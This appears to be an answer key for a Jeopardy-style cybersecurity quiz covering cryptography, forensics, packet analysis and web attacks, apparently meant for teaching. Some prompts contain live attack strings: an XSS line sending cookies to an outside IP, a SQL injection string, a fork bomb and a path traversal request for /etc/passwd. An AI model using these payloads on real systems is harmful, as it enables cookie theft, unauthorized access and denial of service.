Cryptography
Forensics
Network Traffic Analysis
Miscellaneous
Web Based
100

This encryption algorithm uses the same key to encrypt and decrypt data.
 

What is symmetric encryption?

100

This process involves collecting and examining evidence from a computer system after a suspected security incident.

What is digital forensics?

100

What is happening in this Wireshark packet capture?

a TCP 3-way handshake

100

I would like my eggs with a side of cipher please

Bacon Cipher

100

What is this attack commonly called:  
<script>new Image().src="http://192.168.1.6/?c="+document.cookie;</script>

XSS

200

Decode this Base64 string: UGF0aCAwZiBFeGlsZQ==

Path 0f Exile

200

 

Which feature can determine if data has been modified during an investigation?  

hash value

200

In Wireshark, this feature allows you to view all packets belonging to the same TCP conversation together

What is Follow TCP Stream?

200

IP address of the citadel’s website

Address: 23.185.0.4

200

A login form is vulnerable to the following payload: ' OR '1'='1' -- entered in the username field. What type of attack is this, and what does it exploit?"

SQL Injection

300

A password database stores 5f4dcc3b5aa765d61d8327deb882cf99. This is a classic hash of the word password. Identify the hashing algorithm

What is MD5?

300

This Windows artifact stores information about users and system configuration.

What is the Windows Registry?

300

You are investigating a PCAP and find this HTTP request: 

GET /login.php?user=admin&pass=Cyber123 HTTP/1.1 

Host: example.com 

What sensitive information can you identify from this packet, and why would this be a security concern? 

What are the username and password, because they are being transmitted in plaintext HTTP traffic?

300

Steps of kill chain

Recon, weaponization, delivery, exploitation, installation, command and control/ c2, Actions on objectives

300

Two pictures with Ex: /554/ and /555/

IDOR

400

Decode this substitution cipher: R slkv gszg gsviv rh ml kzizwv gsrh Uirwzb.

I hope that there is no parade this Friday

400

This file contains metadata about files and directories on a Windows NTFS volume.

What is the $MFT (Master File Table)?

400

You see these packets in a PCAP: 

192.168.1.15 → 8.8.8.8 

Protocol: DNS 

Query: example.com 

8.8.8.8 → 192.168.1.15 

Protocol: DNS 

Response: 93.184.216.34 

What is happening?

 What is a DNS query and response, where the client asks for the IP address associated with example.com?

400

What is this attack commonly called, :(){ :|:& };:

 Fork bomb

400

A website has this URL: 

/download?file=report.pdf 

You change it to: /download?file=../../../../etc/passwd 

and the server returns the contents of /etc/passwd. What vulnerability is being demonstrated? 

What is Path Traversal / Directory Traversal?

500

You intercept this ciphertext: SGVsbG8gZnJvbSB0aGUgY3J5cHRvIGNoYWxsZW5nZS4= 

You determine that it uses Base64, but Base64 is only the first layer. Decode it completely. What is the final message? 

Hello from the crypto challenge.

500

Magic numbers are bytes that can be used to uniquely identify certain file formats. What file type usually starts with the byte sequence 89 50 4E 47 0D 0A 1A 0A.

PNG file

500

A Wireshark capture shows: 

TCP SYN 

TCP SYN, ACK 

TCP ACK 

TLS Client Hello 

TLS Server Hello 

What can you conclude from this sequence? 

What is a TCP connection is being established and then a TLS-secured session is beginning?

500

An attacker sends thousands of TCP SYN packets with spoofed source IPs but never completes the handshake, exhausting the server's connection table. What is this attack called?

SYN Flood

500

This term is used to refer to the theft of a magic cookie used to authenticate a user to a remote server.

 session hijacking/cookie hijacking